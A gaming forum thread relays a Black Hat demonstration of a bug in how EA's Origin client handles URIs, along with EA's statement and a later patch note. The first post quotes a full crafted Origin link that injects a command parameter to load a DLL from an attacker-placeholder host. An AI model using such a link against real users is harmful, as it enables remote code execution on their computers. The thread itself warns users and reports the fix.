PSA: Bug in How Origin Handles URL's Could Allow Hackers to Remotely Access Your Computer

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Shawn Zipay
    Managing Communities 24/7
    • Apr 2003
    • 69279

    #1

    PSA: Bug in How Origin Handles URL's Could Allow Hackers to Remotely Access Your Computer

    Everyone using Origin could be affected by a vulnerability in how Origin handles uniform resource identifiers (URIs). This is a similar problem that was discovered for Steam back in October.

    This Friday during the Black Hat security conference in Amsterdam, it was demonstrated how the Origin URI system could be used to remotely take control over a computer that clicks on a malicious link.
    The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

    An EA spokesperson issued the following statement.
    "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."

    Just be careful when clicking on links. Unless you know for sure what the links do, don't click on them. Seems like common sense stuff here, right?

    (via Arstechnica)
  • CptainCrunch
    I am the 1%
    • Oct 2007
    • 12976

    #2
    Patch for Origin today:

    Version 9.1.15 - Closed hypothetical exploit of Origin URI (uniform resource identifier) by malicious web sites
    I guess they hypothetically fixed it
    Twitter: @CptainCrunch
    Battlelog/Origin: CptainCrunch

    Comment

    Working...